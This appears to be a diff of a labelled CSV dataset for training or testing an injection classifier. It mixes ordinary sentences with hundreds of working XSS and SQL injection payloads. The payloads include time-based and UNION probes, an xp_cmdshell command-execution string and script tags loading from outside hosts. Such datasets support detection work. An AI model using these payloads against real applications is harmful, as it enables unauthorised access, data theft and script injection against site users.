= 5656,1,1/0 )",2,SQLi,22242 +"Having been ordained in 1833, he undertook college",0,normal,26129 +<optgroup id=x tabindex=1 onbeforeactivate=alert(1,1,XSS,5338 +"--></script></title></style>""/</textarea><a' oncli",1,XSS,9549 +"<tbody onbeforepaste=""alert(1)"" contenteditable>te",1,XSS,4144 +<label onpointerleave=alert(1)>XSS</label>,1,XSS,7941 +1' where 6406 = 6406,2,SQLi,22014 +1' ) or 2633 = dbms_pipe.receive_message ( chr ( 1,2,SQLi,13039 +"<plaintext onmousemove=""alert(1)"">test</plaintext>",1,XSS,6019 +1'|| ( select 'kojx' from dual where 8140 = 8140 a,2,SQLi,12227 +"1' ) ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694",2,SQLi,17622 +select,0,normal,26545 +He was one of the disputants selected to confute t,0,normal,26109 +1 ) ) as xmac where 7692 = 7692,2,SQLi,12952 +<input2 onpointerout=alert(1)>XSS</input2>,1,XSS,2253 +<rtc onpointermove=alert(1)>XSS</rtc>,1,XSS,3673 +Retrieve data where ID matches.,0,normal,23437 +1'+ ( select niht where 7294 = 7294 and 3580 = ( s,2,SQLi,19668 +"1"" ) as ucex where 5148 = 5148 order by 1#",2,SQLi,20920 +1' ) where 5871 = 5871,2,SQLi,13439 +Up to 45% off select DeWalt Power Tools and Access,0,normal,25206 +"1%"" ) ) ) and ( select * from ( select ( sleep ( 5",2,SQLi,17334 +"x' AND userid IS NULL, --",2,SQLi,11692 +1 where 2278 = 2278 and ( select 9067 from ( selec,2,SQLi,21031 +select case when 4656 = 3716 then 1 else null end-,2,SQLi,20405 +"1%"" ) union all select null,null,null,null,null,nu",2,SQLi,19357 +1' ) ) ) and 3602 = 1990#,2,SQLi,14199 +1'|| ( select 'fpfl' from dual where 1434 = 1434 a,2,SQLi,22438 +1'|| ( select 'ttyt' where 3751 = 3751 or 7417 = (,2,SQLi,19268 +"{""id"":null,""name"":""Ivysaur""}",0,normal,27081 +"-2605%' ) ) ) union all select 4738,4738#",2,SQLi,16669 +1' ) as ncou where 9166 = 9166 and ( select * from,2,SQLi,12966 +-3982 ) ) or 6872 = 6872 and ( ( 6331 = 6331,2,SQLi,20107 +"select * from users where id = 1 or 1#""; union sel",2,SQLi,11913 +<nav onblur=alert(1) tabindex=1 id=x></nav><input ,1,XSS,6700 +Select a class to take for self-improvement.,0,normal,23996 +<svg><menuitem onload=alert(1)></menuitem>,1,XSS,6061 +select ( case when ( 2132 = 8969 ) then 1 else 213,2,SQLi,18227 +1%' ) ) and 7756 = dbms_utility.sqlid_to_sqlhash (,2,SQLi,17951 +<rp id=x tabindex=1 onfocusin=alert(1)></rp>,1,XSS,4701 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10753 +<nobr onblur=alert(1) tabindex=1 id=x></nobr><inpu,1,XSS,3323 +1'|| ( select 'scct' where 2587 = 2587 and ( selec,2,SQLi,15867 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10467 +"1' ) and elt ( 3528 = 3566,3566 )",2,SQLi,12449 +"<section onmouseout=""alert(1)"">test</section>",1,XSS,4776 +<template onpointerdown=alert(1)>XSS</template>,1,XSS,6578 +Insert the fresh ink.,0,normal,22711 +"""><img src=""x:x"" onerror=""alert()"">",1,XSS,4712 +( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,17234 +"-5617 ) where 2132 = 2132 union all select 2132,21",2,SQLi,20047 +1' or 7552 = ( select count ( * ) from rdb$fields ,2,SQLi,17225 +"select count ( * ) from generate_series ( 1,500000",2,SQLi,13656 +"<ruby onmouseout=""alert(1)"">test</ruby>",1,XSS,8743 +update,0,normal,23107 +<textarea onpointerleave=alert(1)>XSS</textarea>,1,XSS,5788 +"iif ( 7953 = 3021,1,1/0 )",2,SQLi,15968 +"-8772%"" ) union all select 5433,5433,5433,5433,543",2,SQLi,16991 +1%' ) ) ) and 4386 = utl_inaddr.get_host_address (,2,SQLi,13563 +ORDER BY 31337--,2,SQLi,10273 +Select the right solution for the challenge.,0,normal,24221 +"<command onmousemove=""alert(1)"">test</command>",1,XSS,7228 +<style>@keyframes slidein {}</style><element style,1,XSS,2313 +"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,21379 +"-1432"" ) ) union all select 9008,9008,9008#",2,SQLi,18369 +"1%' ) ) union all select null,null,null,null#",2,SQLi,12661 +<th id=x tabindex=1 onactivate=alert(1)></th>,1,XSS,8394 +Select the right lens for the camera.,0,normal,24098 +"<samp onmousedown=""alert(1)"">test</samp>",1,XSS,8680 +"1%"" and 4241 = convert ( int, ( select char ( 113 ",2,SQLi,15170 +1'+ ( select 'feof' where 1966 = 1966,2,SQLi,12919 +<frameset onpointerout=alert(1)>XSS</frameset>,1,XSS,2825 +<tbody id=x tabindex=1 onbeforeactivate=alert(1)><,1,XSS,4554 +<style>:target {transform: rotate(180deg);}</style,1,XSS,5339 +declare @s varchar ( 200 ) select @s = 0x73656c6 .,2,SQLi,11440 +1'+ ( select tdkt where 4535 = 4535,2,SQLi,14012 +OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 133,2,SQLi,11356 +"<cite onclick=""alert(1)"">test</cite>",1,XSS,3752 +AnD SLEEP(5)--,2,SQLi,10397 +"He edited the Works of William Warburton, the Sele",0,normal,26123 +1' where 3188 = 3188 and 9198 = 9198--,2,SQLi,16535 +Create a beautiful mural in your room.,0,normal,22954 +<body onresize=alert(1)>press F12!,1,XSS,9082 "<a href=""\xE3\x80\x80javascript:javascript:alert(1",1,XSS,525 -I'm thinking of where to attend a workshop.,0,normal,23844 -"1 ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71",2,SQLi,13733 -Select score.,0,normal,24668 -The SPDR Materials Select Sector lost 7.8 percent ,0,normal,25372 +privileges,0,normal,23171 +1' ) ) as egsj where 3447 = 3447,2,SQLi,13735 +Select aim.,0,normal,24665 +The Steel HR also buzzes with notifications from s,0,normal,25369 "<script>throw onerror=eval,'=alert\x281\x29'</scri",1,XSS,123 -"-1830"" ) ) as bptv where 4805 = 4805 or 4144 = ( s",2,SQLi,15621 -><script+src=https://api.cmi.aol.com/catalog/cms/h,1,XSS,9800 -""" Tap ""Reset"" and then select ""Erase All Content a",0,normal,26471 -"<p onkeydown=""alert(1)"" contenteditable>test</p>",1,XSS,2284 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2303 -"hi or 1 = 1 --""",2,SQLi,11610 -Select a meditation technique to try.,0,normal,24070 -"1"" ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ""dpl",2,SQLi,14293 -"<audio onmousemove=""alert(1)"">test</audio>",1,XSS,5821 -"1%"" ) ) ) and char ( 120 ) ||char ( 106 ) ||char (",2,SQLi,14554 -"1' ) procedure analyse ( extractvalue ( 9255,conca",2,SQLi,21207 -1' where 7080 = 7080 or 8514 = benchmark ( 5000000,2,SQLi,16771 -1' where 7613 = 7613,2,SQLi,19440 -1'|| ( select 'boxx' where 2038 = 2038 and 9198 = ,2,SQLi,15174 +1' where 2913 = 2913 and ( select * from ( select ,2,SQLi,15623 +><script+src=http://portal.pf.aol.com/jsonmfus/?se,1,XSS,9802 +""" This allows you to select ""any"" or ""vacation ren",0,normal,26468 +<nobr id=x tabindex=1 onactivate=alert(1)></nobr>,1,XSS,2285 +<picture onpointerup=alert(1)>XSS</picture>,1,XSS,2304 +", exec master..xp_cmdshell 'ping 172.10.1.255'--",2,SQLi,11612 +Select a book for your entertainment.,0,normal,23998 +1'|| ( select 'xhqy' where 4531 = 4531 union all s,2,SQLi,14295 +<style>:target {color: red;}</style><big id=x styl,1,XSS,5823 +1' where 9156 = 9156 and char ( 111 ) ||char ( 77 ,2,SQLi,14556 +"Roebuck, for the appointment of a select committee",0,normal,25742 +1 ) ) as rsnb where 3168 = 3168 procedure analyse ,2,SQLi,16773 +1%' ) ) ) and 3707 = ( select count ( * ) from sys,2,SQLi,19442 +"-4304' where 1005 = 1005 union all select 1005,100",2,SQLi,15176 <input onauxclick=alert(1)>,1,XSS,49 -"1 where 8905 = 8905 and make_set ( 7654 = 1923,192",2,SQLi,16886 -1' ) or sleep ( 5 ),2,SQLi,15012 -<data onpointerdown=alert(1)>XSS</data>,1,XSS,3186 -"( select 1 from generate_series ( 9352,9352,case w",2,SQLi,14346 -"1' ) ) union all select null,null,null,null,null,n",2,SQLi,15775 +1' ) as hvyx where 3194 = 3194 and char ( 107 ) ||,2,SQLi,16888 +"1"" where 4597 = 4597 rlike sleep ( 5 ) --",2,SQLi,15014 +"<col oncontextmenu=""alert(1)"">test</col>",1,XSS,3188 +"1 and elt ( 1210 = 1210,sleep ( 5 ) ) -- ommf",2,SQLi,14348 +1' where 4473 = 4473 and ( select * from ( select ,2,SQLi,15777 <script> const html = '<img src onerror=alert(1)>',1,XSS,230 -"1' where 5786 = 5786 and elt ( 1210 = 1210,sleep (",2,SQLi,21300 -<frameset onpointerout=alert(1)>XSS</frameset>,1,XSS,2825 -"<kbd onmouseover=""alert(1)"">test</kbd>",1,XSS,8773 +"{""id"":null,""firstName"":""Zhang"",""lastName"":""Enlai"",",0,normal,27254 +"<style>@keyframes x{}</style><slot style=""animatio",1,XSS,2826 +<isindex onpointerout=alert(1)>XSS</isindex>,1,XSS,8775 <script>({0:#0=alert/#0#/#0#(0)})</script>,1,XSS,970 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3008 -"{""id"":null,""firstName"":""Shuping"",""lastName"":""Lim"",",0,normal,26998 -"1 and elt ( 8853 = 1675,1675 ) -- jegm",2,SQLi,17459 -))))) waitfor delay '0:0:20' /*,2,SQLi,10943 -1%' ) ) ) and 8514 = ( select count ( * ) from dom,2,SQLi,21783 -Select a style for your blog layout.,0,normal,24192 -"<big onbeforepaste=""alert(1)"" contenteditable>test",1,XSS,7211 -<keygen id=x onfocusin=alert(1)>,1,XSS,2945 -"""),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%2",2,SQLi,10911 -Select the best wedding hairstyle.,0,normal,24386 -( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,14017 -"<code oncut=""alert(1)"" contenteditable>test</code>",1,XSS,4434 --8378%' ) union all select 5491#,2,SQLi,21445 -"1 ) and make_set ( 8403 = 8403,8899 )",2,SQLi,21332 -<command id=x tabindex=1 onfocusin=alert(1)></comm,1,XSS,4162 -"<font draggable=""true"" ondragend=""alert(1)"">test</",1,XSS,3118 -"1"" ) ) ) and 6414 = ( select count ( * ) from rdb$",2,SQLi,17510 -RLIKE SLEEP(5) AND '1337' LIKE '1337,2,SQLi,11233 -"<hgroup oncopy=""alert(1)"" contenteditable>test</hg",1,XSS,5323 -"-2071 union all select 4753,4753--",2,SQLi,13754 -Select a painting technique to try.,0,normal,24055 -1 ) ) as prxq where 4600 = 4600,2,SQLi,20700 -<menuitem onpointerleave=alert(1)>XSS</menuitem>,1,XSS,2420 -Media browser - click on picture to select A typic,0,normal,25884 -Let's find out where the farmer's market is.,0,normal,23784 -"-5247"" union all select 3097,3097,3097,3097,3097,3",2,SQLi,13304 -"<colgroup onbeforepaste=""alert(1)"" contenteditable",1,XSS,7171 -"Macy's didn't forget about the guys, either: they ",0,normal,25898 --8922 or 5903 = ( 'qqpjq'|| ( select case 5903 whe,2,SQLi,21124 +<rtc id=x tabindex=1 ondeactivate=alert(1)></rtc><,1,XSS,3009 +"{""id"":null,""name"":""pig""}",0,normal,26995 +"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,17461 +"""))))) waitfor delay '0:0:20' --",2,SQLi,10945 +1' ) ) ) or sleep ( 5 ) and ( ( ( 'wuwv' = 'wuwv,2,SQLi,21437 +Select a new game to play.,0,normal,24189 +"<td draggable=""true"" ondragleave=""alert(1)"">test</",1,XSS,7213 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2946 +",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfo",2,SQLi,10913 +Where's the best place to enjoy live music?,0,normal,23930 +"1"" ) ) ) or ( select * from ( select ( sleep ( 5 )",2,SQLi,14019 +<style>:target {color: red;}</style><center id=x s,1,XSS,4436 +select sleep ( 5 ) and ( 'qcsv' = 'qcsv,2,SQLi,21443 +"-1413"" ) union all select 6651,6651,6651--",2,SQLi,21330 +"<details onpaste=""alert(1)"" contenteditable>test</",1,XSS,4164 +<style>@keyframes slidein {}</style><blockquote st,1,XSS,3119 +"1"" ) ) as jgie where 8017 = 8017 and ( select * fr",2,SQLi,17512 +")) RLIKE SLEEP(5) AND ((1337""=""1337",2,SQLi,11235 +"<style>@keyframes slidein {}</style><meter style=""",1,XSS,5325 +1' or 5286 = ( select count ( * ) from all_users t,2,SQLi,13756 +"1%"" ) ) ) and 8407 = ( select count ( * ) from gen",2,SQLi,21359 +"{""id"":null,""firstName"":""Linda"",""lastName"":""Chong"",",0,normal,27140 +<style>:target {color:red;}</style><dfn id=x style,1,XSS,2421 +Melody tones This allows you to select from a rang,0,normal,25881 +Where did you get that interesting fact from?,0,normal,23781 +1'+ ( select ahyw where 6893 = 6893 waitfor delay ,2,SQLi,13306 +<link onpointerleave=alert(1)>XSS</link>,1,XSS,7173 +Making your own cover is a great way to truly pers,0,normal,25895 +"1%"" ) and 2716 = ( select count ( * ) from sysuser",2,SQLi,22355 "&lt;EMBED SRC=\""http&#58;//ha&#46;ckers&#46;org/xs",1,XSS,1018 -"{""id"":null,""name"":""go""}",0,normal,27404 -"1' and elt ( 4249 = 4249,7259 ) and 'nsbj' like 'n",2,SQLi,18313 +-7726 or 3038 = 3038,2,SQLi,20282 +1%' and 2006 = 2006,2,SQLi,18315 <img src =q onerror=prompt(8)>,1,XSS,351 -"1%' ) ) ) union all select null,null,null,null,nul",2,SQLi,14896 -1' ) ) ) or sleep ( 5 ) and ( ( ( 'bmnf' like 'bmn,2,SQLi,20941 +1 ) and 8417 = 5276#,2,SQLi,14898 +Where's your SQL output?,0,normal,23420 "<div class=""g-recaptcha"" data-sitekey=""your-site-k",1,XSS,224 -1,0,normal,26728 -1,0,normal,26678 -<tfoot onpointerout=alert(1)>XSS</tfoot>,1,XSS,2501 -Bissell 86T3 Big Green Professional Carpet Cleaner,0,normal,26320 -"1"" ) as aifd where 5962 = 5962",2,SQLi,22206 +1,0,normal,26725 +1,0,normal,26675 +<xmp onpointerup=alert(1)>XSS</xmp>,1,XSS,2502 +"BUENOS AIRES ""Powder Her Face,"" Teatro Colón Selec",0,normal,26317 +"-4686"" ) as dxks where 7123 = 7123 or elt ( 1032 =",2,SQLi,22204 `'><script>\xE2\x80\x88javascript:alert(1)</script,1,XSS,565 -"MAC Pearlmatte Face Powder, $40, available at sele",0,normal,25900 -1) or pg_sleep(5)--,2,SQLi,10368 -Join the tour.,0,normal,22873 -<label onpointerout=alert(1)>XSS</label>,1,XSS,3386 -<q id=x tabindex=1 onactivate=alert(1)></q>,1,XSS,3934 -<xmp onpointerout=alert(1)>XSS</xmp>,1,XSS,7960 -"-5115"" union all select 1642,1642,1642,1642,1642,1",2,SQLi,19092 +Macy's is offering major savings across department,0,normal,25897 +1)) or pg_sleep(5)--,2,SQLi,10370 +1/*'*/,2,SQLi,22518 +"<col onmouseenter=""alert(1)"">test</col>",1,XSS,3388 +<ol onpointerout=alert(1)>XSS</ol>,1,XSS,3936 +"<dir oncontextmenu=""alert(1)"">test</dir>",1,XSS,7962 +"-2414%"" ) or elt ( 1032 = 1032,3623 ) and ( ""%"" = ",2,SQLi,19094 "{""id"":null,""firstName"":""Ng"",""lastName"":""Menglay"",""",0,normal,27447 -"-7238%' or make_set ( 5375 = 9563,9563 ) and '%' =",2,SQLi,14517 -"{""id"":null,""firstName"":""Leong"",""lastName"":""Tommi"",",0,normal,27141 -"<del onkeyup=""alert(1)"" contenteditable>test</del>",1,XSS,3536 -"-6520%"" ) order by 1#",2,SQLi,18317 -Select a fitness class to join.,0,normal,24145 -"{""id"":null,""name"":""low soft""}",0,normal,27349 -Select dessert.,0,normal,24493 -"1 ) procedure analyse ( extractvalue ( 9255,concat",2,SQLi,17206 -"So, again, this might be for a select few of you.",0,normal,25537 -"1"" ) ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ",2,SQLi,13612 -1 ) where 2918 = 2918 and 7533 = 7533--,2,SQLi,22477 -1' and 6510 = ( select count ( * ) from sysusers a,2,SQLi,15995 -select,0,normal,26612 -",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:",2,SQLi,10890 -select * from users where id = 1 or $+<\ union sel,2,SQLi,12019 -<rp onpointerenter=alert(1)>XSS</rp>,1,XSS,7646 -"1%"" ) ) and char ( 107 ) ||char ( 121 ) ||char ( 9",2,SQLi,14117 -"-8093"" ) ) as oboi where 1476 = 1476 union all sel",2,SQLi,14709 -<button onBounce=javascript:alert(1)>,1,XSS,9590 -Create a captivating story about your travels.,0,normal,22900 -"<bdo oncut=""alert(1)"" contenteditable>test</bdo>",1,XSS,2834 -Please select a song.,0,normal,24336 -And to select well out of those choices is pretty ,0,normal,26362 -) or ('1'='1,2,SQLi,9980 -Select the Strict option to start screening out in,0,normal,25580 -"-8881%' union all select 8420,8420,8420,8420,8420,",2,SQLi,14550 -<table onpointerout=alert(1)>XSS</table>,1,XSS,4096 -1 ) ) ) or ( select 9173 from ( select count ( * ),2,SQLi,19074 -"1%"" ) waitfor delay '0:0:5' and ( ""%"" = """,2,SQLi,17574 -<style>:target {color: red;}</style><nobr id=x sty,1,XSS,3991 -"<dd oncut=""alert(1)"" contenteditable>test</dd>",1,XSS,8061 -"UNION ALL SELECT 1,2,3,4--",2,SQLi,10566 -I want to choose a hairstyle for the event.,0,normal,23886 -"1' in boolean mode ) union all select null,null,nu",2,SQLi,16017 -"waitfor delay '0:0:5' and ( ""dmcu"" = ""dmcu",2,SQLi,22211 -#ERROR!,2,SQLi,22541 -Select the best wedding vows.,0,normal,24379 -"-5386' ) union all select 8026,8026,8026,8026,8026",2,SQLi,14800 -"<colgroup draggable=""true"" ondragend=""alert(1)"">te",1,XSS,2786 -"1"" ) ) ) or 6793 = ( select 6793 from pg_sleep ( 5",2,SQLi,21625 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10772 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10687 -"<aside onmouseup=""alert(1)"">test</aside>",1,XSS,3881 -select session_user;,2,SQLi,22503 -Where's the medium?,0,normal,23653 -He decided to join the yoga class next week.,0,normal,22904 -1'|| ( select 'cgup' from dual where 5383 = 5383 w,2,SQLi,21450 --5854 ) ) ) union all select 5645#,2,SQLi,18975 -"x' and email is NULL,",2,SQLi,11976 -"<keygen oncontextmenu=""alert(1)"">test</keygen>",1,XSS,7747 -"1%"" ) union all select null,null,null,null,null,nu",2,SQLi,21559 -"<section oncopy=""alert(1)"" contenteditable>test</s",1,XSS,3946 -<param onfocusout=alert(1) tabindex=1 id=x></param,1,XSS,2165 -<button id=x tabindex=1 onbeforedeactivate=alert(1,1,XSS,2887 -%20'sleep%2050',2,SQLi,10110 -<track onblur=alert(1) tabindex=1 id=x></track><in,1,XSS,4355 -"<content oncontextmenu=""alert(1)"">test</content>",1,XSS,5667 +"1 where 6408 = 6408 union all select null,null,nul",2,SQLi,14519 +"{""id"":null,""name"":""Beelzemon BM""}",0,normal,27139 +<output id=x tabindex=1 onfocusin=alert(1)></outpu,1,XSS,3538 +1'|| ( select 'vasx' where 4770 = 4770 and 7756 = ,2,SQLi,18319 +Select a podcast episode to listen to.,0,normal,24142 +"{""id"":null,""firstName"":""Liew"",""lastName"":""Woon"",""a",0,normal,27348 +Select toppings.,0,normal,24490 +"-1174"" union all select 4303,4303,4303,4303#",2,SQLi,17208 +Some drugmakers last year delayed price hikes on s,0,normal,25534 +"-7738%"" ) union all select 8754,8754,8754,8754,875",2,SQLi,13614 +"-6851' ) or 1570 = convert ( int, ( select char ( ",2,SQLi,22474 +1' in boolean mode ) and 2006 = 2006,2,SQLi,15997 +select,0,normal,26609 +""",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0",2,SQLi,10892 +"admin"" ) or ""1"" = ""1""/*",2,SQLi,12021 +<svg onload=alert(1)>,1,XSS,7648 +1' ) ) as rxhe where 3838 = 3838 or 7417 = ( selec,2,SQLi,14119 +"-3703"" ) ) ) union all select 3293,3293,3293,3293,",2,SQLi,14711 +<button onChange=javascript:alert(1)>,1,XSS,9592 +Delete outdated files from the directory.,0,normal,22897 +<th onpointerleave=alert(1)>XSS</th>,1,XSS,2835 +Select the best option.,0,normal,24333 +"Apple Pay is hitting select stations this Friday, ",0,normal,26359 +) or ('1'='1'--,2,SQLi,9982 +Select the tool (next to the color selection area),0,normal,25577 +1'|| ( select 'rqzu' from dual where 9516 = 9516 o,2,SQLi,14552 +<style>:target {color: red;}</style><var id=x styl,1,XSS,4098 +-4351' ) or 6525 = 9458,2,SQLi,19076 +"1' ) ) union all select null,null,null,null,null#",2,SQLi,17576 +<style onpointermove=alert(1)>XSS</style>,1,XSS,3993 +"<center onpaste=""alert(1)"" contenteditable>test</c",1,XSS,8063 +"UNION ALL SELECT 1,2,3,4,5,6--",2,SQLi,10568 +I want to select a new workout routine.,0,normal,23883 +-9024 ) where 1686 = 1686 or 3069 = 8213--,2,SQLi,16019 +1' ) as eany where 3169 = 3169 and 6414 = ( select,2,SQLi,22209 +#ERROR!,2,SQLi,22538 +Select your dream wedding invitations.,0,normal,24376 +1' ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ) ,2,SQLi,14802 +"<canvas onmouseleave=""alert(1)"">test</canvas>",1,XSS,2787 +"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) an",2,SQLi,21623 +UNION ALL SELECT 'INJ'||'ECT'||'XXX'--,2,SQLi,10774 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10689 +"<noscript ondblclick=""alert(1)"">test</noscript>",1,XSS,3883 +select version();,2,SQLi,22500 +Where's the psychic reader?,0,normal,23650 +Sort alphabetically the documents on your desk.,0,normal,22901 +"1%"" ) ) union all select null,null,null,null,null,",2,SQLi,21448 +"1' or ( select 9173 from ( select count ( * ) ,con",2,SQLi,18977 +AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11978 +<img id=x tabindex=1 onfocusin=alert(1)></img>,1,XSS,7749 +select sleep ( 5 ) # yrpn,2,SQLi,21557 +"<style>@keyframes x{}</style><dir style=""animation",1,XSS,3948 +"<acronym onmouseup=""alert(1)"">test</acronym>",1,XSS,2166 +"<svg onclick=""alert(1)"">test</svg>",1,XSS,2888 +/**/or/**/1/**/=/**/1,2,SQLi,10112 +"<style>@keyframes slidein {}</style><b style=""anim",1,XSS,4357 +"<samp draggable=""true"" ondragenter=""alert(1)"">test",1,XSS,5669 "<form action=""javascript:alert(1)""><input type=sub",1,XSS,173 "<div id=""div1""><input value=""``onmouseover=javascr",1,XSS,640 --9809' order by 1--,2,SQLi,20071 -"<optgroup onbeforecut=""alert(1)"" contenteditable>t",1,XSS,5066 -"<meta HTTP-EQUIV=""Link"" Content=""<http://www.secur",1,XSS,1549 -"<noscript onmouseover=""alert(1)"">test</noscript>",1,XSS,7436 -))))) waitfor delay '0:0:20' --,2,SQLi,10933 -"UNION select table_schema,table_name FROM informat",2,SQLi,10025 -"echo('IPT&gt;alert(\""XSS\"")&lt;/SCRIPT&gt;'); ?&gt",1,XSS,1037 -count,0,normal,23140 -"1' and ( select 9067 from ( select count ( * ) ,co",2,SQLi,14420 -"1%"" or 6793 = ( select 6793 from pg_sleep ( 5 ) ) ",2,SQLi,18828 -<head id=x tabindex=1 onactivate=alert(1)></head>,1,XSS,8419 -1'|| ( select 'lxpg' where 7390 = 7390 and 5556 = ,2,SQLi,18871 -<button onBeforeEditFocus=javascript:alert(1)>,1,XSS,9583 -"1"" and ( 1668 = 8054 ) *8054",2,SQLi,21653 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10714 -"1"" ) as wjdc where 8694 = 8694 and 2853 = cast ( (",2,SQLi,21832 -1%' and char ( 109 ) ||char ( 79 ) ||char ( 70 ) |,2,SQLi,21304 -<td onpointermove=alert(1)>XSS</td>,1,XSS,8258 -"-2548"" ) ) ) or 5107 = 8049--",2,SQLi,12468 -password,0,normal,23170 -Create a drawing.,0,normal,22827 -"1' ) or 8466 = benchmark ( 5000000,md5 ( 0x694a474",2,SQLi,18409 -"-1915%"" ) ) union all select 7732,7732,7732,7732,7",2,SQLi,18257 +"1"" ) where 8571 = 8571 and elt ( 4249 = 4249,7259 ",2,SQLi,20069 +<style>@keyframes slidein {}</style><header style=,1,XSS,5068 +"<style>BODY{-moz-binding:url(""http://www.securityc",1,XSS,1550 +<optgroup id=x tabindex=1 ondeactivate=alert(1)></,1,XSS,7438 +""") waitfor delay '0:0:20' /*",2,SQLi,10935 +"and substring(password/text(),1,1)='7",2,SQLi,10027 +"&lt;IMG SRC=\""http&#58;//www&#46;thesiteyouareon&#",1,XSS,1038 +or,0,normal,23137 +1' ) ) ) rlike ( select ( case when ( 7689 = 7689 ,2,SQLi,14422 +1 ) ) ) and 3754 = ( select upper ( xmltype ( chr ,2,SQLi,18830 +<style>:target {color: red;}</style><sup id=x styl,1,XSS,8421 +"-6116"" ) ) union all select 3679,3679,3679,3679,36",2,SQLi,18873 +<button onBeforePrint=javascript:alert(1)>,1,XSS,9585 +"-8633"" or 5099 = 5974",2,SQLi,21651 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10716 +"1"" ) ) as jikg where 8258 = 8258 and ( 3973 = 1047",2,SQLi,21830 +-6540' ) where 5019 = 5019 or ( 8459 = 8459 ) *490,2,SQLi,21302 +"<p onmouseup=""alert(1)"">test</p>",1,XSS,8260 +"1"" ) where 2834 = 2834 ( select ( case when ( 5451",2,SQLi,12470 +You can select multiple bookmarks to move at once ,0,normal,25080 +Select the wine.,0,normal,22824 +1 ) ) and 2716 = ( select count ( * ) from sysuser,2,SQLi,18411 +1'+ ( select byor where 4538 = 4538,2,SQLi,18259 "<script\x0Dtype=""text/javascript"">javascript:alert",1,XSS,355 -"{""id"":null,""name"":""MeloettaPirouette Forme""}",0,normal,27455 -<bgsound id=x tabindex=1 onfocus=alert(1)></bgsoun,1,XSS,5905 -1' ) as qaec where 6572 = 6572 or 5356 = ( select ,2,SQLi,12955 -<w contenteditable id=x onfocus=alert()>,1,XSS,1165 -Select your contest.,0,normal,24920 -<select onblur=alert(1) id=x></select><input autof,1,XSS,3396 -"1' in boolean mode ) union all select null,null,nu",2,SQLi,14797 -1,0,normal,26705 -"1' ) or 8466 = benchmark ( 5000000,md5 ( 0x694a474",2,SQLi,12761 -"<table onmousedown=""alert(1)"">test</table>",1,XSS,3128 -"<svg/onload=alert(String.fromCharCode(88,83,83))>",1,XSS,9695 -( select ( case when ( 3531 = 3531 ) then ( select,2,SQLi,15139 -<style>@keyframes slidein {}</style><acronym style,1,XSS,8502 -"1%' ) and make_set ( 8403 = 8403,8899 ) and ( '%' ",2,SQLi,22258 -Select pillow.,0,normal,23040 -Modify the recipe slightly.,0,normal,22553 -1'+ ( select 'eoxk' where 6621 = 6621 union all se,2,SQLi,16536 -"<optgroup draggable=""true"" ondrag=""alert(1)"">test<",1,XSS,3588 -"<span onmouseup=""alert(1)"">test</span>",1,XSS,3558 -intersect,0,normal,23185 -#ERROR!,2,SQLi,10963 -"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,13005 --1876%' ) union all select 6463--,2,SQLi,16709 -"1%"" ) ) ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,16006 -<script> alert(asdal'') </script>,1,XSS,5172 -"<element draggable=""true"" ondragenter=""alert(1)"">t",1,XSS,6744 -<frameset id=x tabindex=1 ondeactivate=alert(1)></,1,XSS,7399 -1 or 8315 = ( select count ( * ) from sysibm.systa,2,SQLi,19594 -"]-(SELECT 0 WHERE 1337=1337 AND ELT(1337=1337,SLEE",2,SQLi,11268 -"When you select the eraser, the options bar at the",0,normal,25140 -"jaVasCript:/*-/*`/*\`/*'/*""/**/(/* */oNcliCk={call",1,XSS,9485 -"-2375 union all select 1573,1573,1573,1573#",2,SQLi,13831 -"1"" ) as bksv where 5375 = 5375",2,SQLi,18764 --4176'+ ( select 'muio' where 4256 = 4256 union al,2,SQLi,16893 -"1 ) ) or extractvalue ( 1297,concat ( 0x5c,0x71717",2,SQLi,13891 -"1%"" ) ) ) and 8407 = ( select count ( * ) from gen",2,SQLi,21359 --8636' ) ) ) or 4301 = 7212--,2,SQLi,21048 -<style>:target {color: red;}</style><mark id=x sty,1,XSS,8178 -select * from users where id = 1 union select null,2,SQLi,11621 -<image src/onerror=alert(1)>,1,XSS,7858 -"1"" where 9632 = 9632 and row ( 6237,7469 ) > ( sel",2,SQLi,17486 -Join chat.,0,normal,23075 -<script onload=alert(1) src=validjs.js></script>,1,XSS,2604 -<rt id=x tabindex=1 onbeforedeactivate=alert(1)></,1,XSS,8610 -"<menu oncopy=""alert(1)"" contenteditable>test</menu",1,XSS,8062 -"<mark draggable=""true"" ondragstart=""alert(1)"">test",1,XSS,3251 -"1' ) ) as xntz where 5801 = 5801 or row ( 1045,756",2,SQLi,12602 -1 ) where 8094 = 8094,2,SQLi,15858 +"1"" ( select ( case when ( 4587 = 4587 ) then regex",2,SQLi,21517 +"<summary onkeyup=""alert(1)"" contenteditable>test</",1,XSS,5907 +1' ) as wpom where 2620 = 2620 and elt ( 3114 = 31,2,SQLi,12957 